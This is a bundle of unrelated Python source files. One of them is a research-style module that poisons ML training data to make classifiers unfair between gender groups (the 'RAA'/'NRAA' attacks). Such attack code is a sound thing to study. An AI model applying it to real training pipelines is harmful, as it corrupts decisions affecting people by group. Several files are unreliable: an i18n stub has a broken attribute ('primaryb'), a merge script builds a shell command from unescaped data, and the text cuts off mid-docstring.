for i in range(mergeTime):
# open result_f and current file
result_f = open(result_f_name)
fidx = i+1
f_name = sfc_files[fidx]
f = open(f_name)
# read contents from result_f and current file
content1 = result_f.read().split("\n")
l1 = [int(j) for j in content1[0].split(",")]
content2 = f.read().split("\n")
l2 = [int(j) for j in content2[0].split(",")]
# close files
result_f.close()
f.close()
# merge two lists
mergedl = merge(l1,l2)
if mergedl == None:
print "Error: mergedl is empty!"
print "Some errors occurred in merge(), libMerge.py"
break
# write mergedl to result_f
mergedl_str = ""
for s in mergedl:
mergedl_str += str(s)
mergedl_str += ","
mergedl_str = mergedl_str[:-1]
print mergedl, '\n'
cmd = "echo %s > %s" % (mergedl_str, result_f_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "\nError occurred as writing merged topoOrder!\n"
print output
return
end = datetime.datetime.now()
print "Total time:", (end-start)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='libMerge.py')
parser.add_argument('-n', '--num', help='Test number',
type=int, action="store", default=2)
parser.add_argument('-d', '--dir', help='Output directory name',
type=str, action="store", default="test")
args = parser.parse_args()
if args.dir[-1] is not "/":
args.dir += "/"
# get all the sfcs described in .txt files
requests = os.listdir(args.dir)
sfc_files = []
for item in requests:
# ignore non-request
if ".txt" not in item:
continue
f_name = args.dir+item
sfc_files.append(f_name)
result_f_name = args.dir+"result.txt"
run_merge_sfcs(sfc_files, result_f_name, args.num)
|
#!/bin/env python3
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import yaml
import argparse
DEFAULT_ACL = """
[access "refs/*"]
owner = group {repo}-core
[access "refs/heads/*"]
label-Code-Review = -2..+2 group {repo}-core
label-Verified = -2..+2 group {repo}-core
label-Workflow = -1..+1 group {repo}-core
label-Workflow = -1..+0 group Registered Users
submit = group {repo}-core
read = group Registered Users
[access "refs/meta/config"]
read = group {repo}-core
read = group Registered Users
[receive]
requireChangeId = true
[submit]
mergeContent = false
action = fast forward only
"""
def usage():
p = argparse.ArgumentParser()
p.add_argument("--repo", action='append')
p.add_argument("--core")
p.add_argument("output")
return p.parse_args()
def main():
args = usage()
name = args.repo[0]
resources = {
'repos': {
name: {
'description': 'The %s repository' % name,
'acl': '%s-acl' % name
}
},
'acls': {
'%s-acl' % name: {
'file': DEFAULT_ACL.format(repo=name),
'groups': ['%s-core' % name]
}
},
'groups': {
'%s-core' % name: {
'description': 'The %s core group' % name,
'members': [args.core]
}
}
}
if len(args.repo) > 1:
for repo in args.repo[1:]:
resources['repos'][repo] = {
'description': 'The %s repository' % repo,
'acl': '%s-acl' % name
}
with open(args.output, "w") as of:
yaml.safe_dump({'resources': resources}, of, default_flow_style=False)
if __name__ == "__main__":
main()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Translation support for messages in this library.
"""
import oslo_i18n
from oslo_i18n import _factory
# Create the global translation functions.
_translators = _factory.TranslatorFactory(domain='myapp')
# The primary translation function using the well-known name "_"
_ = _translators.primaryb
_C = _translators.contextual_form
_P = _translators.plural_form
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LI = _translators.log_critical
|
Ctx = {}
|
import json
import os
import shutil
from flask import current_app, jsonify
from flask_restful import Resource, marshal
from flask_restful.fields import Raw
import analysisweb_user
from analysisweb.api import db
from analysisweb_user.models import MetaDataException
class IDField(Raw):
def format(self, value):
return {"id": value.id, "label": value.label}
class ResourceInvalidInputException(Exception):
response_code = 400
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
db.session.rollback()
class ResourceNotFoundException(Exception):
response_code = 404
class ResourceForbiddenActionException(Exception):
response_code = 405
class ResourceBase(Resource):
db_table = None
fields = None
def get_all(self):
return [marshal(m, self.fields) for m in self.db_table.query.all()]
def get_resource(self, id_, table=None):
table = table or self.db_table
try:
id_ = int(id_)
except ValueError:
raise ResourceInvalidInputException("Item ID is not a valid integer")
try:
resource = table.query.get(id_)
except Exception as e: # noqa
raise ResourceNotFoundException(
"Item could not be retrieved from database: {}".format(e)
)
if resource is None:
raise ResourceNotFoundException("Item does not exists in the database")
else:
return resource
def delete_resource(self, base_path, db_resource):
if hasattr(db_resource, "jobs") and db_resource.jobs:
raise ResourceForbiddenActionException(
"Item cannot be removed because it is associated with a job"
)
json_resource = self.dump_resource(db_resource)
shutil.rmtree(os.path.join(base_path, str(db_resource.id)))
db_resource.clean_up(db.session)
db.session.delete(db_resource)
db.session.commit()
return json_resource
def dump_resource(self, db_resource):
return marshal(db_resource, self.fields)
@staticmethod
def load_metadata(metadata, db_resource):
if metadata is None:
return
meta_data = json.loads(metadata)
if meta_data:
try:
db_resource.meta_data = meta_data
except MetaDataException as e:
raise ResourceInvalidInputException("Invalid metadata: {}".format(e))
class MetaResource(Resource):
@staticmethod
def load_meta(filename):
path = os.path.abspath(os.path.dirname(analysisweb_user.__file__))
meta_filename = os.path.join(path, filename)
with open(meta_filename, "r") as f:
meta = json.load(f)
current_app.config[
"JSON_SORT_KEYS"
] = False # This is not recommended by Flask but done here locally
meta = jsonify(meta)
current_app.config["JSON_SORT_KEYS"] = True
return meta
|
"""Расчет дивидендов и дохода начиная с определенной даты в пересчете на неделю, месяц и год."""
import pandas as pd
from poptimizer.data.views import indexes
from poptimizer.reports import pdf, pdf_middle
def get_investor_data(file_name: str, investor_name: str) -> pd.DataFrame:
"""Формирует DataFrame с вкладами, стоимостью активов и дивидендами инвестора."""
df = pdf.read_data(file_name)
value_column = "Value_" + investor_name
investor_share = df[value_column] / df["Value"]
df["Dividends"] = df["Dividends"] * investor_share
df = df[[investor_name, value_column, "Dividends"]]
df.columns = ["Inflow", "Value", "Dividends"]
return df
def constant_prices_data(report_name: str, investor_name: str, months: int) -> pd.DataFrame:
"""Переводит данные в постоянные цены."""
df = get_investor_data(report_name, investor_name)
df = df.iloc[-months - 1 :]
cpi = indexes.cpi(df.index[-1])
cpi = cpi[-len(df) :]
cpi = cpi.cumprod()
cpi = cpi.iloc[-1] / cpi
return df.mul(cpi.values, axis="index")
def rescale_and_format(x: float, divider: float) -> str:
"""Текстовое представление данных.
Умножает на множитель и форматирует с округлением до тысяч, разделением разрядов и
выравниванием вправо."""
return f"{round(x / divider, -3):,.0f}".replace(",", " ").rjust(9)
def income(report_name: str, investor_name: str, months: int):
"""Распечатывает дивиденды и доход с начальной даты в среднем за год, месяц и неделю.
Данные пересчитываются в постоянные цена на основе CPI для сопоставимости на длительных
промежутках времени.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param investor_name:
Имя инвестора, для которого осуществляется расчет.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
df = constant_prices_data(report_name, investor_name, months)
dividends = df["Dividends"].iloc[1:].sum()
incomes = df["Value"].iloc[-1] - df["Value"].iloc[0] - df["Inflow"].iloc[1:].sum()
months = len(df) - 1
periods = dict(Y=months / 12, M=months, W=(months / 12) * 365.25 / 7)
print(f"\n{investor_name} в среднем (с коррекцией на инфляцию) за {months} месяцев:")
for period, divider in periods.items():
print(
f"1{period}:",
f"Дивиденды = {rescale_and_format(dividends, divider)},",
f"Доход = {rescale_and_format(incomes, divider)}",
)
def monthly_returns(report_name: str, months: int) -> pd.DataFrame:
"""Необходимое количество месяцев для анализа."""
df = pdf_middle.portfolio_cum_return(pdf.read_data(report_name).iloc[-months - 1 :])
df = pd.concat([df, pdf_middle.index_cum_return(df)], axis=1).pct_change().dropna()
df.columns = ["Portfolio", "MOEX"]
return df
def stats(report_name: str, months: int):
"""Отчет ос статистических свойствах портфеля в сравнении с рынком.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
df = monthly_returns(report_name, months)
results = dict()
results["MEAN"] = df.mean() * 12
results["STD"] = df.std() * 12 ** 0.5
results[""] = ["", ""]
results["G_MEAN"] = df.add(1).product(axis=0) ** (12 / len(df)) - 1
results["PROXI"] = results["MEAN"] - results["STD"] ** 2 / 2
results["Sharpe"] = results["MEAN"] / results["STD"]
results = pd.DataFrame(results).T
print(f"\n{results}")
def history(report_name: str, investor_name: str, months: int):
"""Распечатывает историческую статистику за определенное число месяцев дял инвестора и портфеля.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param investor_name:
Имя инвестора, для которого осуществляется расчет.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
income(report_name, investor_name, months)
stats(report_name, months)
|
"""
File: bouncing_ball.py
Name: 賴珈汶
-------------------------
TODO: When the user clicks, the ball will fall and bounce.
While the ball reaches the right wall, the ball will come back to the initial site.
"""
from campy.graphics.gobjects import GOval
from campy.graphics.gwindow import GWindow
from campy.gui.events.timer import pause
from campy.gui.events.mouse import onmouseclicked
VX = 3
DELAY = 10
GRAVITY = 1
SIZE = 20
REDUCE = 0.9
START_X = 30
START_Y = 40
OVER_WINDOW = 3
over_window = 0
window = GWindow(800, 500, title='bouncing_ball.py')
ball = GOval(SIZE, SIZE, x=START_X, y=START_Y)
ball.filled = True
window.add(ball)
def main():
"""
This program simulates a bouncing ball at (START_X, START_Y)
that has VX as x velocity and 0 as y velocity. Each bounce reduces
y velocity to REDUCE of itself.
"""
onmouseclicked(move)
def move(mouse):
"""
The ball falls and bounces when clicking. When it reaches the
window, it will come back to the initial state.
"""
vy = 0
global over_window
ball_at_start = window.get_object_at(START_Y, START_Y)
if ball_at_start is not None and over_window < OVER_WINDOW:
while True:
ball.move(VX, vy)
vy += GRAVITY
if ball.y+ball.height >= window.height:
vy = -vy * REDUCE
pause(DELAY)
if ball.x >= window.width:
ball.x = START_X
ball.y = START_Y
over_window += 1
break
if __name__ == "__main__":
main()
|
from .BayesGau import *
|
from garage.regressors.product_regressor import ProductRegressor
__all__ = ["ProductRegressor"]
|
# -*- coding: UTF-8 -*-
"""
此脚本用于比较LAD线性回归和OLS线性回归
"""
import statsmodels.api as sm
from sklearn import linear_model
from statsmodels.regression.quantile_regression import QuantReg
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def generate_data():
"""
随机生成数据
"""
np.random.seed(4889)
# Python2和Python3的range并不兼容,所以使用list(range(10, 29))
x = np.array([10] + list(range(10, 29)))
error = np.round(np.random.randn(20), 2)
y = x + error
# 增加异常点
x = np.append(x, 29)
y = np.append(y, 29 * 10)
return pd.DataFrame({"x": x, "y": y})
def train_OLS(x, y):
"""
训练OLS线性回归模型,并返回模型预测值
"""
model = linear_model.LinearRegression()
model.fit(x, y)
re = model.predict(x)
return re
def train_LAD(x, y):
"""
训练LAD线性回归模型,并返回模型预测值
"""
X = sm.add_constant(x)
model = QuantReg(y, X)
model = model.fit(q=0.5)
re = model.predict(X)
return re
def visualize_model(x, y, ols, lad):
"""
模型结果可视化
"""
# 创建一个图形框
fig = plt.figure(figsize=(6, 6), dpi=80)
# 在图形框里只画一幅图
ax = fig.add_subplot(111)
# 设置坐标轴
ax.set_xlabel("$x$")
ax.set_xticks(range(10, 31, 5))
ax.set_ylabel("$y$")
# 画点图,点的颜色为蓝色,半透明
ax.scatter(x, y, color="b", alpha=0.4)
# 将模型结果可视化出来
# 用红色虚线表示OLS线性回归模型的结果
ax.plot(x, ols, 'r--', label="OLS")
# 用黑色实线表示LAD线性回归模型的结果
ax.plot(x, lad, 'k', label="LAD")
plt.legend(shadow=True)
# 展示上面所画的图片。图片将阻断程序的运行,直至所有的图片被关闭
# 在Python shell里面,可以设置参数"block=False",使阻断失效
plt.show()
def OLS_vs_LAD(data):
"""
比较OLS模型和LAD模型的差异
"""
features = ["x"]
label = ["y"]
ols = train_OLS(data[features], data[label])
lad = train_LAD(data[features], data[label])
visualize_model(data[features], data[label], ols, lad)
if __name__ == "__main__":
data = generate_data()
OLS_vs_LAD(data)
|
import pandas as pd
data_frame = {'name' : ['1'], 'email':['2'], 'phone':['3']}
df = pd.DataFrame(data=data_frame, index = ["we're on the way to success"])
print(df)
df.to_csv('contact_list_magic.csv')
#####
# import tkinter
# tkinter.messagebox.
# print(tkinter.ACTIVE)
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import time
import numpy as np
import os
import defenses
import data_utils as data
import cvxpy as cvx
import tensorflow as tf
import random
def poison_with_influence_proj_gradient_step(model, general_train_idx,
sensitive_file, attack_method, advantaged, test_idx, indices_to_poison,
projection_fn,
step_size=0.01,
shrink_towards='cluster_center',
loss_type='normal_loss',
force_refresh=True,
test_description=None,
output_root=None):
"""
Returns poisoned_X_train, a subset of model.train_dataset (marked by indices_to_poison)
that has been modified by a attack iteration step.
"""
train_dataset = model.train_dataset
validation_dataset = model.validation_dataset
test_dataset = model.test_dataset
if test_description is None:
test_description = test_idx
grad_filename = os.path.join(output_root, 'grad_influence_wrt_input_val_%s_testidx_%s.npy' % (
model.model_name, test_description))
if (force_refresh == False) and (os.path.exists(grad_filename)):
grad_influence_wrt_input_val = np.load(grad_filename)
else:
grad_influence_wrt_input_val = model.get_grad_of_influence_wrt_input(
indices_to_poison,
test_idx,
verbose=False,
force_refresh=force_refresh,
test_description=test_description,
loss_type=loss_type)
poisoned_X_train = train_dataset.x[indices_to_poison, :]
poisoned_X_train -= step_size * grad_influence_wrt_input_val
poisoned_labels = train_dataset.labels[indices_to_poison]
weights = model.sess.run(model.weights)
if(attack_method == "RAA"):
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
gender_labels = np.zeros(train_dataset.labels.shape[0])
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == -1))[0]
else:
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == 1))[0]
rand1 = random.randint(0, op_indx.shape[0] - 1)
print("Hello\n" * 3)
print(rand1)
poisoned_X_train[0] = train_dataset.x[op_indx[rand1], :]
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == 1))[0]
else:
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == -1))[0]
rand2 = random.randint(0, op_indx.shape[0] - 1)
poisoned_X_train[1] = train_dataset.x[op_indx[rand2], :]
elif(attack_method == "NRAA"):
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
gender_labels = np.zeros(train_dataset.labels.shape[0])
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == -1))[0]
else:
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == 1))[0]
maxdist = 0
maxpoint = 0
for points in range(op_indx.shape[0]):
temp = 0
for p in range(op_indx.shape[0]):
if(np.allclose(train_dataset.x[op_indx[points], :], train_dataset.x[op_indx[p], :], rtol=0, atol=1)):
temp = temp + 1
if(temp > maxdist):
maxdist = temp
maxpoint = points
poisoned_X_train[0] = train_dataset.x[op_indx[maxpoint], :]
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == 1))[0]
else:
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == -1))[0]
maxdist = 0
maxpoint = 0
for points in range(op_indx.shape[0]):
temp = 0
for p in range(op_indx.shape[0]):
if(np.allclose(train_dataset.x[op_indx[points], :], train_dataset.x[op_indx[p], :], rtol=0, atol=3)):
temp = temp + 1
if(temp > maxdist):
maxdist = temp
maxpoint = points
poisoned_X_train[1] = train_dataset.x[op_indx[maxpoint], :]
print('weights shape is ', weights.shape)
poisoned_X_train = projection_fn(
poisoned_X_train,
poisoned_labels,
theta=weights[:-1],
bias=weights[-1])
return poisoned_X_train
def iterative_attack(
model,
general_train_idx,
sensitive_file,
attack_method,
advantaged,
indices_to_poison,
test_idx,
test_description=None,
step_size=0.01,
num_iter=10,
loss_type='normal_loss',
projection_fn=None,
output_root=None,
num_copies=None,
stop_after=3,
start_time=None,
display_iter_time=False,
stopping_method='Accuracy'):
"""
Performs the main specified adversarial attack
:param model: Model to attack
:general_train_idx: Index of last element in the training data
:sensitive_file: File specifiying the sensitive group labels (dataset_group_label)
:attack_method: Used attack method
:advantaged: Index of advantaged group (1 or -1)
:indices_to_poison: Indeces to be poisoned
:test_idx: Depricated
:test_description: Depricated
:step_size: Step size for attacks with adversarial loss
:num_iter: Maximum number of attack iterations
:loss_type: Loss type for different attacks. (adversarial_loss when one is used else normal_loss)
:projection_fn: Projection function to project updated poisoned points to feasible set
:output_root: Output root directory
:num_copies: Number of copies to make for poisoned points
:stop_after: Patience for stopping training
:start_time: Start time of training
:display_iter_time: Print time of every iteration if true
:stopping_method: Method to evaluate best model
"""
if num_copies is not None:
assert len(num_copies) == 2
assert np.min(num_copies) >= 1
assert len(indices_to_poison) == 2
assert indices_to_poison[1] == (indices_to_poison[0] + 1)
assert indices_to_poison[1] + num_copies[0] + \
num_copies[1] == (model.train_dataset.x.shape[0] - 1)
assert model.train_dataset.labels[indices_to_poison[0]] == 1
assert model.train_dataset.labels[indices_to_poison[1]] == -1
copy_start = indices_to_poison[1] + 1
assert np.all(
model.train_dataset.labels[copy_start:copy_start + num_copies[0]] == 1)
assert np.all(model.train_dataset.labels[copy_start + num_copies[0]:copy_start + num_copies[0] + num_copies[1]] == -1)
largest_test_loss = 0
largest_parity = 0
stop_counter = 0
print('Test idx: %s' % test_idx)
if start_time is not None:
assert num_copies is not None
times_taken = np.zeros(num_iter)
Xs_poison = np.zeros(
(num_iter, len(indices_to_poison), model.train_dataset.x.shape[1]))
Ys_poison = np.zeros((num_iter, len(indices_to_poison)))
nums_copies = np.zeros((num_iter, len(indices_to_poison)))
for attack_iter in range(num_iter):
since = time.time()
print(num_iter)
print('*** Iter: %s' % attack_iter)
model.attack_iter = attack_iter
# Create modified training dataset
old_poisoned_X_train = np.copy(
model.train_dataset.x[indices_to_poison, :])
poisoned_X_train_subset = poison_with_influence_proj_gradient_step(
model,
general_train_idx,
sensitive_file,
attack_method,
advantaged,
test_idx,
indices_to_poison,
projection_fn,
step_size=step_size,
loss_type=loss_type,
force_refresh=True,
test_description=test_description,
output_root=output_root)
if num_copies is not None:
poisoned_X_train = model.train_dataset.x
poisoned_X_train[indices_to_poison, :] = poisoned_X_train_subset
copy_start = indices_to_poison[1] + 1
poisoned_X_train[copy_start:copy_start +
num_copies[0], :] = poisoned_X_train_subset[0, :]
poisoned_X_train[copy_start + num_copies[0]:copy_start +
num_copies[0] + num_copies[1], :] = poisoned_X_train_subset[1, :]
else:
poisoned_X_train = np.copy(model.train_dataset.x)
poisoned_X_train[indices_to_poison, :] = poisoned_X_train_subset
# Measure some metrics on what the gradient step did
labels = model.train_dataset.labels
dists_sum = 0.0
poisoned_dists_sum = 0.0
poisoned_mask = np.array([False] * len(labels), dtype=bool)
poisoned_mask[indices_to_poison] = True
if(attack_method != "RAA" and attack_method != "NRAA"):
for y in set(labels):
cluster_center = np.mean(
poisoned_X_train[labels == y, :], axis=0)
dists = np.linalg.norm(
poisoned_X_train[labels == y, :] - cluster_center, axis=1)
dists_sum += np.sum(dists)
poisoned_dists = np.linalg.norm(
poisoned_X_train[(labels == y) & (poisoned_mask), :] - cluster_center, axis=1)
poisoned_dists_sum += np.sum(poisoned_dists)
dists_mean = dists_sum / len(labels)
poisoned_dists_mean = poisoned_dists_sum / len(indices_to_poison)
dists_moved = np.linalg.norm(
old_poisoned_X_train - poisoned_X_train[indices_to_poison, :], axis=1)
print('Average distance to cluster center (overall): %s' % dists_mean)
print('Average distance to cluster center (poisoned): %s' %
poisoned_dists_mean)
print('Average diff in X_train among poisoned indices = %s' %
np.mean(dists_moved))
print('Fraction of 0 gradient points: %s' %
np.mean(dists_moved == 0))
print('Average distance moved by points that moved: %s' %
np.mean(dists_moved[dists_moved > 0]))
# Update training dataset
model.update_train_x(poisoned_X_train)
# Retrain model
results = model.train()
if start_time is not None:
end_time = time.time()
times_taken[attack_iter] = end_time - start_time
Xs_poison[attack_iter, :, :] = np.copy(poisoned_X_train_subset)
Ys_poison[attack_iter,
:] = model.train_dataset.labels[indices_to_poison]
nums_copies[attack_iter, :] = num_copies
print('attack_iter', attack_iter)
print('num_iter - 1', num_iter - 1)
if ((attack_iter + 1) % 10 == 0) or (attack_iter == num_iter - 1):
print('in')
if(stopping_method == 'Accuracy'):
# Calculate test loss
test_loss = results['test_loss']
if largest_test_loss < test_loss:
print('test loss match')
largest_test_loss = test_loss
np.savez(os.path.join(output_root, '%s_attack' % (model.model_name)),
poisoned_X_train=poisoned_X_train,
Y_train=model.train_dataset.labels,
attack_iter=attack_iter + 1)
stop_counter = 0
else:
stop_counter += 1
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
nums_copies=nums_copies)
if(stopping_method == 'Fairness'):
# Calculate test loss
E0, Parity = results['E0'], results['Parity']
if largest_parity < E0 + Parity:
print('parity match')
largest_parity = E0 + Parity
np.savez(os.path.join(output_root, '%s_attack' % (model.model_name)),
poisoned_X_train=poisoned_X_train,
Y_train=model.train_dataset.labels,
attack_iter=attack_iter + 1)
stop_counter = 0
else:
stop_counter += 1
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
nums_copies=nums_copies)
# Printing time for every iter, if display_iter_time is set to True
now = time.time()
if (display_iter_time == True):
total_time = now - since
print('TOTAL ELAPSED TIME FOR ONE ITERATION \n', total_time)
if stop_counter >= stop_after:
print('STOPPING METHOD USED IS: ',
stopping_method, ' STOPPING NOW')
break
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
Xs_poison=Xs_poison,
Ys_poison=Ys_poison,
nums_copies=nums_copies)
def get_feasible_flipped_mask(
X_train, Y_train,
centroids,
centroid_vec,
sphere_radii,
slab_radii,
class_map,
use_slab=False):
sphere_dists_flip = defenses.compute_dists_under_Q(
X_train, -Y_train,
Q=None,
subtract_from_l2=False,
centroids=centroids,
class_map=class_map,
norm=2)
if use_slab:
slab_dists_flip = defenses.compute_dists_under_Q(
X_train, -Y_train,
Q=centroid_vec,
subtract_from_l2=False,
centroids=centroids,
class_map=class_map,
norm=2)
feasible_flipped_mask = np.zeros(X_train.shape[0], dtype=bool)
for y in set(Y_train):
class_idx_flip = class_map[-y]
sphere_radius_flip = sphere_radii[class_idx_flip]
feasible_flipped_mask[Y_train == y] = (
sphere_dists_flip[Y_train == y] <= sphere_radius_flip)
if use_slab:
slab_radius_flip = slab_radii[class_idx_flip]
feasible_flipped_mask[Y_train == y] = (
feasible_flipped_mask[Y_train == y] &
(slab_dists_flip[Y_train == y] <= slab_radius_flip))
return feasible_flipped_mask
def init_gradient_attack_from_mask(
X_train, Y_train,
epsilon,
feasible_flipped_mask,
general_train_idx,
sensitive_file,
attack_method,
use_copy=True):
"""
Calculates the advantaged group and computes initial poisoned data points and adds them to the training data.
:param X_train: training set features
:param Y_train: training set labels
:param epsilon: controlling parameter specifiying number of poisoned points to be copied such that n_poisoned = eps len(X_train)
:param feasible_flipped_mask: Mask of feasible set
:param general_train_idx: Index of last element in X_train
:param sensitive_file: File specifying labels of the sensitive feature
:param attack_method: Method of attack
:param use_copy: Make copies of poisoned points if true, otherwise only one point per label gets sampled
:return:
- X_modified: X_train with added poisoned points
- Y_modified: Y_train with added poisoned points
- indices_to_poison: Indices of poisonoed datapoints
- copy_array: Array specifiying number of copies of poisoned datapoints [num_pos_copies, num_neg_copies]
- advantaged: Label of advantaged group
- test_gender_labels: Sensitive feature labels (1, -1) of test_set (needed for Solans)
"""
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
advantaged = 1
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
index_male_true_train = np.where(np.logical_and(
group_label[0:general_train_idx] == 0, Y_train == 1))[0].astype(np.int32)
index_female_true_train = np.where(np.logical_and(
group_label[0:general_train_idx] == 1, Y_train == 1))[0].astype(np.int32)
train_data_one_female_prob = group_label[0:general_train_idx][
index_female_true_train].shape[0] / female_train_index.shape[0]
train_data_one_male_prob = group_label[0:general_train_idx][
index_male_true_train].shape[0] / male_train_index.shape[0]
gender_labels = np.zeros(general_train_idx)
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
test_size = len(male_test_index) + len(female_test_index)
test_gender_labels = np.zeros(test_size)
for k in range(test_size):
if(k in male_test_index):
test_gender_labels[k] = 1
elif(k in female_test_index):
test_gender_labels[k] = -1
if not use_copy:
num_copies = int(np.round(epsilon * X_train.shape[0]))
idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask)[0],
size=num_copies,
replace=True)
X_modified = data.vstack(X_train, X_train[idx_to_copy, :])
Y_modified = np.append(Y_train, -Y_train[idx_to_copy])
copy_array = None
indices_to_poison = np.arange(X_train.shape[0], X_modified.shape[0])
else:
num_copies = int(np.round(epsilon * X_train.shape[0]))
# Choose this in inverse class balance
num_pos_copies = int(np.round(np.mean(Y_train == -1) * num_copies))
num_neg_copies = num_copies - num_pos_copies
np.random.seed(0)
if(train_data_one_female_prob > train_data_one_male_prob):
advantaged = -1
pos_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == 1) & (gender_labels == -1))[0])
neg_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == -1) & (gender_labels == 1))[0])
else:
advantaged = 1
pos_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == 1) & (gender_labels == 1))[0])
neg_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == -1) & (gender_labels == -1))[0])
if(neg_idx_to_copy in female_train_index):
print("female")
else:
print("male")
if(pos_idx_to_copy in female_train_index):
print("female")
else:
print("male")
print(neg_idx_to_copy)
print(pos_idx_to_copy)
# exit()
num_pos_copies -= 1
num_neg_copies -= 1
X_modified, Y_modified = data.add_points(
X_train[pos_idx_to_copy, :],
1,
X_train,
Y_train,
num_copies=1)
X_modified, Y_modified = data.add_points(
X_train[neg_idx_to_copy, :],
-1,
X_modified,
Y_modified,
num_copies=1)
X_modified, Y_modified = data.add_points(
X_train[pos_idx_to_copy, :],
1,
X_modified,
Y_modified,
num_copies=num_pos_copies)
X_modified, Y_modified = data.add_points(
X_train[neg_idx_to_copy, :],
-1,
X_modified,
Y_modified,
num_copies=num_neg_copies)
copy_array = [num_pos_copies, num_neg_copies]
indices_to_poison = np.arange(X_train.shape[0], X_train.shape[0] + 2)
return X_modified, Y_modified, indices_to_poison, copy_array, advantaged, test_gender_labels
|
import logging
from typing import List, Any
import numpy as np
import pandas as pd
import pyskindose.constants as c
from .db_connect import db_connect
from .phantom_class import Phantom
logger = logging.getLogger(__name__)
def calculate_field_size(field_size_mode, data_parsed, data_norm):
"""Calculate X-ray field size at image recepter plane.
Parameters
----------
field_size_mode : str
Choose either 'CFA' ('collimated field area) or 'ASD' (actual shutter
distance).
If field_size_mode = 'CFA', the field side in lateral- and
longutudinal direction are set equal to the square root of the
collimated field area. NOTE, this should only be used when actual
shutter distances are unavailabe.
IF field_size_mode = 'ASD', the function calculates the field size
by distance scaling the actual shutter distance to the detector plane
data_parsed : [type]
[description]
data_norm : [type]
[description]
Returns
-------
[type]
[description]
"""
# if collimated field are mode, set FS_lat = FS_long =
# sqrt(collimate field area). NOTE: This should only be used when actual
# shutter distances are unavailable.
if field_size_mode == 'CFA':
FS_lat = round(100 * np.sqrt(data_parsed.CollimatedFieldArea_m2), 3)
FS_long = FS_lat
return FS_lat, FS_long
def position_geometry(
patient: Phantom,
table: Phantom,
pad: Phantom,
pad_thickness: Any,
patient_offset: List[int],
patient_orientation: c.PATIENT_ORIENTATION_HEAD_FIRST_SUPINE
) -> None:
"""Manual positioning of the phantoms before procedure starts.
In this function, the patient phantom, support table, and pad are
